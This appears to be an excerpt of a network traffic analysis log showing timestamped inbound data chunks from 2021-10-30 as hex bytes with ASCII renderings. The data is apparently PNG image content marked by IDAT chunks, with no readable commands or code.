                                                                                                                                                                                      2021-10-30 11:52:10 UTC237INData Raw: 77 dc aa 1c 6f 5b 19 67 b1 33 54 b8 7f 26 4c ca b6 6a e7 f6 e3 78 18 a5 8e fa 51 7f 0c 75 8f 5c 7a 32 11 08 8b 71 db 42 4f 32 89 db e1 d8 4a 8b dd 9a 3c d9 62 42 8b 7c c9 cb 8e e8 fc 62 55 26 38 16 59 0f d8 21 e1 ee ca 4f fc c4 4f 94 2f fb b2 2f 2b 1f fb b1 1f db 33 df f2 2d df 52 7e f0 07 7f b0 fc 97 ff f2 5f fc 12 c0 df 06 78 03 13 ec dd b5 c7 bc f7 65 56 07 2f 1f 15 e5 83 b5 28 26 28 04 77 db 29 b9 13 a8 13 fc 7f ed d7 7e ad eb c0 8f 86 b7 60 c1 05 51 be e9 8b f0 80 3c 83 d6 9f 17 33 d6 2b 5b 64 06 ff 28 69 1b a9 47 c0 f1 1a c7 a5 e0 e2 d8 25 8f 0d 94 8a 2c 46 8c 99 b6 4f 30 ee db 7e 83 9f c5 2a 3f c2 be de dd 34 40 1f a0 4d 38 be 84 9f 77 07 91 05 0a 50 94 34 7a 36 ed 40 19 de 69 85 7f ea a1 18 78 67 5e 65 ee 88 32 9a b6 69 15 b5 bb 81 8f f1 52 2e 27
                                                                                                                                                                                      Data Ascii: wo[g3T&LjxQu\z2qBO2J<bB|bU&8Y!OO//+3-R~_xeV/(&(w)~`Q<3+[d(iG%,FO0~*?4@M8wP4z6@ixg^e2iR.'
                                                                                                                                                                                      2021-10-30 11:52:10 UTC240INData Raw: 56 04 78 10 00 00 ff f4 49 44 41 54 e5 86 6b a9 8e 65 d7 76 3d ed ee dc 55 76 29 6c 8f 26 30 7e 22 8a 1f ba 1f 16 ef 08 9e 5d ae fa d9 11 76 c0 f8 4a 76 e5 c5 3f d8 ae 8e cf 5b a3 d4 4b 85 d7 8b a2 e1 45 69 ac 6c 29 1c 7e 76 6a 91 d8 ce f1 33 69 94 1e 65 4e 8c db 0c 0d 0d 95 91 91 91 b2 53 13 ea ae e1 61 7f bc 12 e5 d2 f2 54 1e 26 03 cb 40 86 fa a4 ce 6d 87 69 e5 62 79 a8 ce 91 2f 36 3c 78 b7 a3 a3 80 0d 2f 4c a0 ee 37 32 8e 6b 6c a7 eb 68 80 5c b4 a5 4e 69 33 7e d3 90 78 76 39 f8 b8 28 f1 83 86 49 3b 17 eb 1f 39 f1 a0 79 21 0f 77 e3 50 3e 29 08 25 cd 0a 7f 37 b4 bc eb 24 fb ea d4 75 e7 fb c2 2f fc 42 2b 99 ab d1 bf 9b c9 62 74 78 ef 01 fb d3 bf 28 9f ef 84 01 76 d2 36 7a 54 f8 8a 57 bc c2 c7 b2 b4 d7 f1 83 47 7d 74 c3 a7 28 50 30 da a3 3e 64 13 45 cd 0b
                                                                                                                                                                                      Data Ascii: VxIDATkev=Uv)l&0~"]vJv?[KEil)~vj3ieNSaT&@miby/6<x/L72klh\Ni3~xv9(I;9y!wP>)%7$u/B+btx(v6zTWG}t(P0>dE
                                                                                                                                                                                      2021-10-30 11:52:10 UTC245INData Raw: 9b 7a b1 4b 71 74 7f fd 2c c4 cb 5f fe f2 15 df 10 cb 84 cf 62 8b 7f 70 40 84 66 6c 94 d4 ab 52 58 00 bb 43 a1 b3 1e f3 ab bf fa ab ce 7f 68 cf c1 15 e1 2c f4 ec d6 a1 fc 7d d0 07 7d d0 8a b8 f5 98 9f fc c9 9f 34 fd a3 07 eb f7 ab c6 ba 5d 0a 8e 43 07 d3 46 21 3a b8 e7 80 27 1c ea 19 43 5b f2 e0 e3 4f a0 a8 ee e3 9d 82 ca f1 d1 20 9d 7b 19 64 9e 7b 5c a7 8f 9e 54 df ab 4a 1a 71 94 05 18 53 1c 87 66 57 8d bb 5f 83 74 ee 66 a2 20 2d 2c d7 df b6 05 69 4f e2 99 43 de f8 e4 df f8 cd 57 94 4d 14 e6 93 27 4f 3e 8b ce 5a 0c 79 d9 89 a4 07 1e 3b 74 cc 8b 51 14 b5 97 be f4 a5 ab e6 b9 9b c9 17 f2 19 13 80 ab 25 c8 85 45 86 be 9d 1d 09 c0 5c c2 f7 0d 2f 49 01 67 37 8d 9d b4 0f fd d0 0f 5d 95 ee bd 4c ef 7e a2 1e 1a 28 8f 30 64 96 f1 14 50 4f 78 b8 de 7d 02 e5 23 3f
                                                                                                                                                                                      Data Ascii: zKqt,_bp@flRXCh,}}4]CF!:'C[O {d{\TJqSfW_tf -,iOCWM'O>Zy;tQ%E\/Ig7]L~(0dPOx}#?
                                                                                                                                                                                      2021-10-30 11:52:10 UTC249INData Raw: aa be 40 f3 ee ec a6 f1 0b 1c d0 a2 ac c8 ee 9d 97 9e f6 bc 8f 02 f6 fc e7 3f 7f 45 be 1c 97 f3 db ba d9 cd 5b ef f8 c8 9b 9e c7 0f 1c d5 9c 57 7f a2 2e 63 1d c0 4b 6b c8 c3 af 10 d0 9e 94 35 c8 53 94 6a 8e a8 f3 42 8c 72 f6 e8 51 2f e8 64 fc d8 a8 cc ec 68 27 2e 20 cc 69 e5 86 37 80 8d 09 ad 28 75 01 6d 44 1e 2b 09 ca 9f 36 6a 15 40 40 de ec 10 92 0e 7b 05 5f 32 29 03 10 17 7e 00 ee 20 e9 01 65 b4 6e 10 5a 94 81 1d 3e 70 8b 50 2f 7d e8 3b 5c 08 3f d8 a4 0f af 49 0f c2 07 61 a9 3b 1b 05 b8 93 8e 7c 19 33 a9 13 d9 12 06 9e 4d b3 d6 29 e5 c5 0d fa 34 fa 32 a0 8c f0 4b 78 35 95 56 4b 27 75 c0 04 d0 23 3c e9 52 0f fc b5 ac 1a 97 f8 d5 90 fc 6d ba a4 5d 2d 0f 69 36 b3 f3 80 56 8a f6 cb 87 12 d5 67 14 c1 93 fc ad 32 3b b7 58 96 6e f0 7d 33 3e 50 7b b3 8c 69 12
                                                                                                                                                                                      Data Ascii: @?E[W.cKk5SjBrQ/dh'. i7(umD+6j@@{_2)~ enZ>pP/};\?Ia;|3M)42Kx5VK'u#<Rm]-i6Vg2;Xn}3>P{i
                                                                                                                                                                                      2021-10-30 11:52:10 UTC253INData Raw: ee f4 c2 9c ef 0f ba 1e e2 c1 bc c9 1d 50 ae 77 d3 24 03 14 17 db 92 0b 3b 0d ee b4 92 09 6f 6f 92 86 c9 96 ef ba 71 b4 e2 e3 22 f9 b9 a7 46 e7 83 38 32 e9 d5 5f 65 78 b2 51 9d 73 6c 6b 99 28 8e 78 10 85 a2 35 0e 57 5a e7 53 fe 7c 7b 2a e1 18 d2 f1 74 94 49 80 9d 03 78 c5 9d fe c3 6e 13 f1 35 2d 6f 69 6d f3 4e 1a 97 a8 df 9d dd b4 9f f9 99 9f b1 7d 68 2f 5f b0 57 f9 2a 2b 7c 23 4b f8 43 09 06 1b 7d 91 60 10 28 23 9f fe e9 9f 5e be fa ab bf da c7 75 7c d0 f6 39 27 1f 76 5f 01 d4 d7 8a 7d c7 0b 36 06 e0 3f 7f b5 7e 4c 95 5d 85 8d de 1d 63 27 85 5d 2b c0 db dd c8 f0 97 7e e9 97 ee b9 eb 04 ef 2c ee ad 09 9d b5 80 45 9e ba 3f ef 79 cf 2b ff f2 5f fe cb f2 fd df ff fd 3d 5e 46 86 76 95 93 87 8e 39 dd 7a 65 fd d4 53 4f d9 a6 cf d3 3f 68 37 64 96 17 09 fe d1 3f
                                                                                                                                                                                      Data Ascii: Pw$;ooq"F82_exQslk(x5WZS|{*tIxn5-oimN}h/_W*+|#KC}`(#^u|9'v_}6?~L]c']+~,E?y+_=^Fv9zeSO?h7d?
                                                                                                                                                                                      2021-10-30 11:52:10 UTC257INData Raw: 5f a7 81 16 e3 a3 a3 83 4d 9e 41 59 30 37 d6 3e cf 2f f7 f0 f9 28 f8 53 99 f0 cf 91 a8 5b 99 b1 56 e7 1c fa 31 30 5f 9a 6f a0 1b 7e ad 70 0a a4 c9 1c 98 b1 0a f0 53 96 eb a5 b5 e2 e6 72 bd 46 93 b9 2b f9 02 f3 2d 93 30 f2 e3 c7 6e 4d 0d ab e5 82 e4 83 67 ca 27 0d 6b 0f 6f c4 52 17 4e 1d 08 27 bd e7 4f d6 bc a6 dc 8c db ac e5 6c aa a0 e5 60 13 de a6 0f 1d ca 00 c4 0d a2 4d 8b a9 bc d5 79 c1 76 27 5b 0c fe d0 48 dd 5a 24 9f 29 b6 99 28 a4 1a 15 e2 02 65 2b 19 83 1f 82 a4 a1 42 98 7c 60 2e c4 5a 3a f1 c7 0d 92 36 a6 0a a0 da a1 8d 3f a8 fe be c2 53 d3 57 de c2 67 b4 ea c4 31 20 e9 1c 4c 90 0c 5e 6c ee a0 f0 e3 ec f5 85 08 26 79 4d 72 ea a8 62 cf 69 73 b4 17 fe 53 66 ad 7f 9f 8f 84 c7 8d 0c c8 1f fe 80 f3 f1 e7 fc b5 6e 94 87 a4 fd 6d 31 4d 02 0c 2c 76 be c6
                                                                                                                                                                                      Data Ascii: _MAY07>/(S[V10_o~pSrF+-0nMg'koRN'Ol`Myv'[HZ$)(e+B|`.Z:6?SWg1 L^l&yMrbisSfnm1M,v
                                                                                                                                                                                      2021-10-30 11:52:10 UTC261INData Raw: ff e6 6d d9 1c 37 af 77 37 0d 3a dc a1 82 27 76 fd a0 73 e6 d2 19 ef 8a a1 10 ff fc cf ff fc b3 fa 1e f7 c3 be ec cb be cc f9 50 d0 8e 68 3e 25 3f 73 49 5e 68 e0 e7 b2 da 3c 77 33 ec 64 41 8b 87 08 76 9e 98 d3 1e 97 92 c6 11 3c 0a 59 7b 5f 8b 9d b1 3f fc c3 3f 5c 57 1f c0 a4 ef d0 7e 3f f9 93 3f f9 ac 3a b1 53 8b 52 c5 a2 72 60 ff a1 9e 92 e1 d1 af e6 72 2f 50 3a b0 d6 b6 42 b6 d9 c5 e3 f7 8e d3 9f 32 ff 78 b7 5e 32 9b d0 c3 2a 60 dc 0d ee 42 22 eb bc e8 32 34 32 62 d9 78 ae ef 68 c4 8d 61 1c 63 70 03 6c 8f 71 d9 59 b4 01 61 49 6f 1a 32 3e 51 50 2d 7b bf 6c d0 99 a4 c3 c6 50 3e 7c 63 03 f2 06 e1 c5 fd 9b 72 bb b8 a4 05 2d ad a4 6d 17 71 e0 3a 8a 84 77 d9 c4 43 75 8b 86 d2 b6 bc 0f 22 34 59 23 23 e3 ca 03 7c d7 75 d9 77 b9 55 33 2f c1 1c b9 08 a4 19 94 49
                                                                                                                                                                                      Data Ascii: m7w7:'vsPh>%?sI^h<w3dAv<Y{_??\W~??:SRr`r/P:B2x^2*`B"242bxhacplqYaIo2>QP-{lP>|cr-mq:wCu"4Y##|uwU3/I
                                                                                                                                                                                      2021-10-30 11:52:10 UTC265INData Raw: cb 78 ae e9 e6 9f da d7 4a 99 99 a9 f2 5c 2b 90 2d 7c 50 56 0b da f0 27 7e e2 27 3a 5f 55 d4 d7 b2 ab 79 37 f0 80 90 5d cf 7d fb 0f 96 cd db 34 67 78 4c eb 3f 99 de fc dd 8d 69 e6 0a cf 5d 9a e7 88 a3 1f b5 ca e5 9d 90 17 1e b8 1e 72 53 0f 82 28 68 b3 d3 f5 cd 6f c6 00 8a da 20 a0 4b 1f 02 bb 34 86 b2 20 5a d9 f1 3c 0b 9f fa 4f 61 b6 99 33 65 98 6b 12 67 5b 6d e2 7c 5d 5d c0 a0 3f 6d 06 3c 5f 37 26 61 20 79 06 d3 60 ea 3a 54 d3 31 c9 21 2f 1b c9 cb 93 9e fa 37 a6 f2 5c 4d f8 86 6c 1d 6f 7d da 80 97 d7 28 33 6b 24 ee c4 d3 bf 50 80 db 7a 10 7e d3 0a 51 5d 47 92 36 f5 6b dd 00 7f 5b 27 f2 10 8f a1 4c e2 da b0 a4 6f f3 e0 6e c3 31 49 1b e0 17 19 19 e2 2a 5d 5f db 11 48 87 21 0d 75 a2 9d b1 bd 56 74 f4 18 67 fe 9c 89 d2 25 3c e3 2b f5 24 7f e4 94 b2 09 0b 2f
                                                                                                                                                                                      Data Ascii: xJ\+-|PV'~':_Uy7]}4gxL?i]rS(ho K4 Z<Oa3ekg[m|]]?m<_7&a y`:T1!/7\Mlo}(3k$Pz~Q]G6k['Lon1I*]_H!uVtg%<+$/
                                                                                                                                                                                      2021-10-30 11:52:10 UTC269INData Raw: 90 d1 73 4e dc ef 07 0d 64 45 3f 1f ec 8f b6 91 df 33 75 bc 93 c6 f1 8a ab 93 74 ed 39 7c 4b ec c9 4b 67 9c 86 5d 3f 7e 06 6c b0 ce fc 70 37 4a c8 31 95 7b 68 df a1 5e de c8 6c 4a f5 3b 73 e5 9c 69 90 97 9d c1 3b d5 13 f9 43 8b 8f dc d2 e6 d0 3a 7a f0 68 39 74 f0 b0 c7 4b 4b db e3 4d 7e e8 02 ea e8 71 21 83 3b 71 93 52 86 2f 5f b9 68 19 f3 65 fd b5 b4 19 0a 62 7e 2e 8a b9 f8 01 2b 69 db 2d a7 77 3d f1 0e 97 c1 ef b6 de ab af b7 78 e9 4b 5f ea fa ed 18 1a 2a 23 7b ea cb 16 20 75 0a e0 39 bc a7 6e b4 55 fa 4c e2 da 7c 7c 0b 6d 56 0f 41 8c 3f c6 f3 5a c6 d6 20 da 3a c3 e3 ee fd fb 7b e5 83 94 49 dd 83 3b f1 1e 77 8b 84 a7 7d c0 20 fd d8 55 89 e8 c7 a5 dc c1 f2 f0 63 ea 47 59 eb 5a 02 da b4 ad dd d2 1c 04 f1 ed 1a 9a b0 3e c8 df 39 05 68 25 2d e5 e2 37 7d 9b
                                                                                                                                                                                      Data Ascii: sNdE?3ut9|KKg]?~lp7J1{h^lJ;si;C:zh9tKKM~q!;qR/_heb~.+i-w=xK_*#{ u9nUL||mVA?Z :{I;w} UcGYZ>9h%-7}
                                                                                                                                                                                      2021-10-30 11:52:10 UTC272INData Raw: 01 6c 41 e5 62 df 15 ca c7 4b 03 28 8f d0 c0 b4 bc c4 bf 1a da b8 c1 74 2d 1d 0c fd 11 3b 6d da 22 6d 05 48 53 f3 ae 54 d4 08 6f 91 30 6c d0 c6 13 b6 5a 78 90 b8 f4 21 90 3c e1 2f e1 00 27 e1 90 4a 78 ed 1b f8 fb bc 07 49 93 b2 e3 57 09 04 3a bc a5 03 f0 b7 b2 21 3c fd 2f 69 2b 0f 91 4f b5 09 23 5d 1b 86 9d 31 81 7f 90 0e 6e f2 25 ae a5 1b 7f d2 02 e8 10 8f 49 59 de 00 e8 44 db d2 88 1f b4 e9 33 a6 93 26 80 4f d0 a3 db a5 05 76 6b 1e 67 4e 51 ed 7b 79 29 ab 7e e8 be f2 09 0d e2 1c 2f bd a1 e5 27 34 5b 37 e9 49 93 b2 37 1d 3d 76 a2 f7 85 04 37 92 00 01 14 8f 14 da 03 05 75 4e 88 0c 82 d8 d0 c8 a4 44 3a 76 a1 40 bd 2f 55 29 f0 3f 95 60 11 70 3e 65 83 29 ca 06 61 b0 e5 81 0a 04 ad d0 83 36 1e 0c fa 49 cf 60 74 fd e0 5f d9 b7 68 22 f2 77 dd ba b4 e4 21 1d f1
                                                                                                                                                                                      Data Ascii: lAbK(t-;m"mHSTo0lZx!</'JxIW:!</i+O#]1n%IYD3&OvkgNQ{y)~/'4[7I7=v7uND:v@/U)?`p>e)a6I`t_h"w!
                                                                                                                                                                                      2021-10-30 11:52:10 UTC277INData Raw: 5b e0 27 7d 0c 08 5f 69 e3 96 ee bd 4c d2 b5 36 74 c0 60 59 f7 e2 05 73 27 90 b6 cd 9f f4 2d 8d a0 f5 c7 8d 89 8c 70 b7 6d 31 88 c1 f0 b8 57 c8 b6 cd 46 7a 94 36 21 65 d1 2f 01 36 7e 40 fe d0 48 58 64 95 7c 18 c2 c8 17 7e 5b 37 08 7f 2e a3 4b 9f f1 80 49 ba d0 02 6d b9 31 c4 c5 1d 3e 07 4d 78 66 6c c6 9d f2 63 42 37 3c 62 f0 67 3e 24 4f e8 b5 e9 03 d7 a3 43 e2 41 2d ab ba 13 de c6 a7 4c 6c f3 96 42 62 56 c3 6a e1 11 12 18 cc 4b 81 6d 58 fc 55 e0 34 0c 82 a3 e2 d0 a1 22 fd f2 a1 8b 49 05 07 99 8f 69 91 0a 05 6d ba 98 20 bc a4 9c b8 9b 24 4e c3 53 2b 3b 4e e1 23 34 98 b4 ab 22 d7 f7 fb 03 b5 b7 3a 25 4d 79 78 3a 8e 52 e6 fb 65 7a a2 81 1e 8d 4b 59 80 74 5e 80 f1 28 a1 dd 5a cc f2 a4 42 7e 8e 3f d8 f1 02 f0 e4 85 5d 39 d2 89 d9 ed 60 07 2e 74 e1 31 fc e2 e7
                                                                                                                                                                                      Data Ascii: ['}_iL6t`Ys'-pm1WFz6!e/6~@HXd|~[7.KIm1>MxflcB7<bg>$OCA-LlBbVjKmXU4"Iim $NS+;N#4":%Myx:RezKYt^(ZB~?]9`.t1
                                                                                                                                                                                      2021-10-30 11:52:10 UTC281INData Raw: d1 87 04 2a c2 61 80 a0 15 f2 74 00 b2 b4 3e df 06 ab 8e 3a 3e 6b f6 fb 56 95 c8 1d 90 b4 23 69 5a d8 1c 6c 6b c0 99 d4 20 0b 5d 29 91 f2 35 ff b4 49 5f c0 59 39 9c ce 6f 22 d7 48 c0 1f 7b 6d d2 07 7d 70 0c 9a aa 4e 0f f8 a8 cc 8d c5 f4 f7 70 c2 61 43 d3 2f 2f e9 f4 01 bd f4 68 9f 72 c9 a4 0e dc bc fd ff e4 e1 83 dd dd 07 f7 fa 32 0b 3f 19 55 bb 56 1f e0 fb 92 0d 27 91 a2 6b 3d 69 a9 89 4a f1 e7 a4 3c 2b 59 64 db 97 6f 98 38 96 5d 7f 93 a7 4f 25 27 7e 6e 33 f2 ca ed a0 ac 46 6d 26 2e b5 03 f6 24 a9 26 44 d7 fa 32 e2 ec 9c f0 58 41 d3 a6 27 3c 35 61 22 10 ed e1 91 cb 61 fc 45 cb b6 9d 38 49 64 bb 6a f5 37 fd 61 50 9d 68 51 ba 1a d6 ef d9 2a 9d 5e 45 db c6 81 49 58 df 7b 87 9f de a8 63 4b 5f fd c0 22 f3 43 47 3c fa 92 75 c6 ca ed 0b d0 a5 8d 0e fd c7 1f d7
                                                                                                                                                                                      Data Ascii: *at>:>kV#iZlk ])5I_Y9o"H{m}pNpaC//hr2?UV'k=iJ<+Ydo8]O%'~n3Fm&.$&D2XA'<5a"aE8Idj7aPhQ*^EIX{cK_"CG<u
                                                                                                                                                                                      2021-10-30 11:52:10 UTC285INData Raw: f8 c5 7b bc 1d 54 d4 35 2e 7c 26 17 e8 69 7b 9f 4b 40 65 c6 c3 0a bd f4 5f fb 20 84 ff cc f7 59 56 57 fe d7 ff fa 5f 5d f2 6a 0e 6f d6 bf 5c fb 57 55 6a e8 e6 32 32 13 36 d1 f7 76 5d b9 d4 13 ae 7b ac 96 d5 be c4 44 8a 7d 95 ed c2 f8 62 c7 81 ed 70 af 56 51 e5 f7 e8 2d 26 73 0f 77 f7 1f 9f ec ee 3d 3a a9 fa e3 dd 83 9e e8 71 6f e6 94 f4 90 95 b3 7e c0 a6 ea f0 b8 bc 4a ac 9e ac 15 bf 2f 25 b2 0d 6b 9b e1 df 6d e6 01 95 2d ea 36 ea 31 26 ef 6d 5b 42 fb c9 5d fd e1 8f 57 e5 74 9e 95 e3 5c 82 39 1c 23 d8 c0 bd aa 35 9b be b7 41 fb dc 48 98 03 90 af 2e a5 34 f1 a7 6e 0c 28 b7 9b 7c 74 6c 43 bd 3f 17 90 a9 83 9d 4f 7b 32 51 7b 56 b0 bf 7b d9 93 97 dc 02 e3 98 53 42 1e f2 44 ea 4b e4 4d 99 48 bd 8c e3 24 91 7b e5 fc 0c 1e c3 27 7d d2 27 75 f9 b0 26 6a c6 00 fa
                                                                                                                                                                                      Data Ascii: {T5.|&i{K@e_ YVW_]jo\WUj226v]{D}bpVQ-&sw=:qo~J/%km-61&m[B]Wt\9#5AH.4n(|tlC?O{2Q{V{SBDKMH${'}'u&j
                                                                                                                                                                                      2021-10-30 11:52:10 UTC289INData Raw: 90 af af 2c d5 cf 63 3d 48 7d 73 42 87 63 bf 36 00 1d f5 84 fa 8c 8d a0 0d 21 73 4c 8c 2f 01 eb 39 ae 96 f0 b5 a1 84 d6 f1 4a 90 2b 29 40 a5 51 5b b5 3e ff db fb d0 ca b8 cb be 6d a4 7c 58 e2 c7 fc ac 3b 36 e4 84 4f 60 3f c8 21 fb 69 5e e6 33 b9 51 2b 9d 0a c9 fe c6 b9 40 39 3e ec 2b 3c 7d c1 4f 1d ea c9 db bf 47 cd 80 10 50 c1 32 65 a9 bb 52 22 7d ac 94 b8 88 7f 0c c6 a1 4c 9d 8c 2f 3f 75 87 d2 2f e5 90 a6 53 ca b7 4d a5 38 d8 d1 96 57 d0 2f b2 fe ab 32 6d e6 3e 9d 81 fc bd fc 02 cc 09 63 b6 0b 4f 7d 72 39 91 25 7f 0e 3e 3c 2d 75 b5 4e b0 38 e2 40 d7 97 81 aa 9c 57 5a 4c 0e bd 03 6c 81 e6 de 9b ad 8e 4d 11 07 7b d0 3b 4d 51 e7 bf 1d c8 e6 b5 23 13 1b b9 3b 13 27 bd 12 74 1d 6f b4 d1 e3 45 ba a0 4f e0 54 e0 95 0d f9 f0 64 26 25 4f 7c ee 27 34 5b 3c c0 84
                                                                                                                                                                                      Data Ascii: ,c=H}sBc6!sL/9J+)@Q[>m|X;6O`?!i^3Q+@9>+<}OGP2eR"}L/?u/SM8W/2m>cO}r9%><-uN8@WZLlM{;MQ#;'toEOTd&%O|'4[<
                                                                                                                                                                                      2021-10-30 11:52:10 UTC293INData Raw: 5f c0 13 b3 b0 bf a9 0b f6 3c fe 75 fd 6c ae ea cb 97 27 7f c5 2a 23 ae 24 94 27 4f ac ba c0 5c e0 53 d2 56 c7 78 d2 8a 94 61 27 29 03 e9 7f 05 fb fd 1a 6b 45 f2 ad 63 a3 dd 31 fb e1 bd 7d 9b 64 7e 00 3d f3 a3 ec e3 c2 26 9f e3 f8 21 6f 3e 87 ea 26 9f ff 39 17 e5 b6 1d cc e7 1a 3d 4a 30 76 73 b5 e8 d0 1e 3b 50 9a 67 da 62 9f b1 c1 01 8a b6 93 94 25 c1 37 79 79 09 f8 b9 31 80 fe e4 a5 1d 7c cb 43 87 cf e6 47 81 cc b8 2b 9d 87 94 67 7d 8d fd 2c c8 fe 50 4f 7f c0 b6 3c b5 b5 e3 7f 79 e8 64 5f 13 5c 0e b2 9f bc 13 66 f4 9e 9b 7b a3 aa de af c6 a8 10 ec 60 7d b0 2f 1e 07 40 ea fd 74 62 c9 98 1c 30 41 82 c7 0e 45 d9 bc 09 b1 cf 89 1d 13 3f b6 e7 40 38 d0 bf 32 ef 01 c3 6f ef dc e4 57 65 f7 b7 f8 ac a8 75 bf 82 da 6e eb 0b 25 fa 4c 2a 99 cc e1 5b 79 eb 14 91 8f
                                                                                                                                                                                      Data Ascii: _<ul'*#$'O\SVxa')kEc1}d~=&!o>&9=J0vs;Pgb%7yy1|CG+g},PO<yd_\f{`}/@tb0AE?@82oWeun%L*[y
                                                                                                                                                                                      2021-10-30 11:52:10 UTC297INData Raw: 79 f7 e2 bb de b1 cf 8b 09 db 2f ff e5 bf 7c f7 5b 7f eb 6f 3d 77 ff 60 e2 c4 64 ed 4f fc 89 3f d1 93 b7 ea c4 ee e1 83 93 be 24 7a ff f6 9d fe d2 45 8e 39 66 a5 34 c6 e7 e0 ac ee e0 f4 fe fd 2e 7f da 4f fb 69 5d 9e 07 fa c2 18 33 1e 7c 36 cb 55 83 f6 56 23 c5 3d 8c 93 b1 00 39 80 94 af a4 4f ea 02 1e db 25 65 ca ad af fa c9 37 ee 79 be f5 9f 31 04 ba c9 4b 5b 65 92 3c 29 f9 40 5b f9 b4 33 37 ed 80 75 e4 e4 95 32 74 39 4e 0a b7 2d 48 3b 63 63 0f 32 ae 24 5f c0 a3 ed 58 58 fa 85 1d c8 07 c4 e9 63 f6 46 f2 d4 97 b0 39 10 ed 39 af 00 f9 6b dd 18 00 5e fa c3 56 3d 90 31 05 f6 8e cd ea 37 7d a9 03 ac 67 6c b1 71 50 80 08 c6 c6 1b 03 88 00 18 42 06 cc c0 2b e4 53 9a 80 be 04 09 59 1a 23 f5 d7 f6 0a f8 d9 41 40 5d 7e fa 4d 1d fd 02 f5 95 3b 38 19 3b eb 92 be 93
                                                                                                                                                                                      Data Ascii: y/|[o=w`dO?$zE9f4.Oi]3|6UV#=9O%e7y1K[e<)@[37u2t9N-H;cc2$_XXcF99k^V=17}glqPB+SY#A@]~M;8;
                                                                                                                                                                                      2021-10-30 11:52:10 UTC301INData Raw: 8e 15 7e f5 6d 7c 5a f8 60 65 84 d5 9e 4f fc c4 4f dc 7f 3e 57 30 19 64 55 88 cb a4 5c fa 74 3b e8 5f ec 63 14 df ba fd 9a 31 6f d6 7e 1b a9 a7 1f 4a f8 b9 cd d2 27 e8 7e 17 6c 83 f4 d3 b1 62 2c d3 7e 8d 49 5b 7f 60 b5 59 4b 80 1d e0 a7 8d 98 9c f3 b0 c5 0f fa 41 3f a8 79 e7 81 cb 8d 4c 2e f8 6d 4f c7 38 fb 28 d6 be 21 33 5f fb 74 ef f6 9d 8e 4d dc cf f8 8c cf 68 bd a7 81 d5 27 7e 81 00 70 89 90 1c f0 75 6c 2c cd 47 5e e6 02 cc 87 15 2c fa d3 4f 89 96 0a 5f be b8 bc c9 65 5e 2e b1 f2 a3 ff ef 79 cf 7b ce 9d 78 b1 4f 31 41 a3 1f 4c d0 a8 af 97 50 8f 81 be 30 f1 7d e3 8d 37 7a d2 79 f3 e5 17 97 9c 67 9f 99 07 13 ac 43 c8 5b 6d df 87 ac 53 32 1e 8e b3 3c 90 75 4a eb 09 c7 52 5b 6d d2 87 27 73 71 4c 67 05 32 d8 f3 de 3e 74 e7 a8 02 4f bb 92 36 5f 7f e3 e6 6c
                                                                                                                                                                                      Data Ascii: ~m|Z`eOO>W0dU\t;_c1o~J'~lb,~I[`YKA?yL.mO8(!3_tMh'~pul,G^,O_e^.y{xO1ALP0}7zygC[mS2<uJR[m'sqLg2>tO6_l
                                                                                                                                                                                      2021-10-30 11:52:10 UTC304INData Raw: 4d 63 cb 67 00 00 2d 29 49 44 41 54 03 f0 d8 c7 e4 03 75 81 b6 60 86 82 b8 87 cf 2c 40 67 7b 98 e0 e0 c4 00 94 d6 81 75 3b 92 c0 e9 ca d3 5e 92 97 38 26 87 4c dc ba fe 4d dc 12 a4 ad ba e7 e5 a8 1f 75 13 a9 7f ac 9e 31 81 3e 90 ee eb 55 aa 97 f1 00 65 52 ca 00 f5 b9 fc f9 76 7d f8 fc 22 c0 8b 37 6e f6 aa da d5 da 71 aa 87 2d e3 47 c1 77 75 e2 a6 cd 01 df 97 d2 b6 7c f3 63 2e 6c e6 de 99 eb af df cf 56 0a ec 44 e8 a9 c3 aa 54 bf f4 b4 76 16 e4 d4 bd c4 e9 07 21 a1 9d 63 de f1 6a d2 84 2d 8e b1 87 f0 db 8c 02 ab 76 4e b2 1c 2f 4a da fb 18 38 28 1b fc 81 f6 dd ed f1 d2 bf a9 59 7d 67 f5 8c d5 a5 f9 3d 4e 2e 7b 3e ee 17 d4 f2 eb 02 95 75 d1 f4 85 95 b2 c9 09 df 3d ad 1b fe 38 ef b1 a3 be 4e 38 d6 fe 0a f8 dd d7 52 63 3c 49 4a 5f bd 62 58 f2 d6 d9 26 7e 62 ef
                                                                                                                                                                                      Data Ascii: Mcg-)IDATu`,@g{u;^8&LMu1>UeRv}"7nq-Gwu|c.lVDTv!cj-vN/J8(Y}g=N.{>u=8N8Rc<IJ_bX&~b
                                                                                                                                                                                      2021-10-30 11:52:10 UTC309INData Raw: 4b dd b5 0d cc d3 7d 07 a4 9e 6d fa 4a 5b be 76 b6 1d 0b 6d 2c e1 41 20 f5 e4 09 6d 29 1d df 1c eb 84 ba 10 3a 6c 7f fb 9d 32 f6 23 fa 05 f4 e3 b1 07 98 03 ba 96 9e 13 33 0f c0 39 10 e8 bb 27 6a 5c 36 e2 0f 3d 9d b0 02 32 2b 22 07 a7 d6 4d ce c0 40 99 50 9f 0e a1 b7 9f a8 15 f5 a5 23 74 f8 db ec ec 78 31 f8 b7 af f7 89 87 49 64 21 3b 6c fc 2e 7b e2 72 f0 05 32 37 eb c8 5d 01 e9 1c d2 47 e8 88 e4 83 6d de da 3c 36 08 39 a7 3e d0 9f 58 7d 00 da f4 45 d9 d8 b0 43 8d bc 57 d3 6a 6c 88 c1 d3 9e 2f 5c bf b5 7b c7 0b 2f ed 6e f1 0e 35 de a9 d6 33 f0 b2 61 ab 55 0e 4c 66 b0 e9 1d a5 fc b2 72 46 9d 55 b1 9e 80 17 88 71 ed da b5 be 47 8c 4b a6 4c d0 1e 3e 9c 17 52 9a 2f 3b 8d f5 be 4f ed d2 5c d2 e4 c9 35 80 2e 76 fc 30 33 2f f5 e4 52 a5 3b a7 fd 28 07 bd bd e8 5f
                                                                                                                                                                                      Data Ascii: K}mJ[vm,A m):l2#39'j\6=2+"M@P#tx1Id!;l.{r27]Gm<69>X}ECWjl/\{/n53aULfrFUqGKL>R/;O\5.v03/R;(_
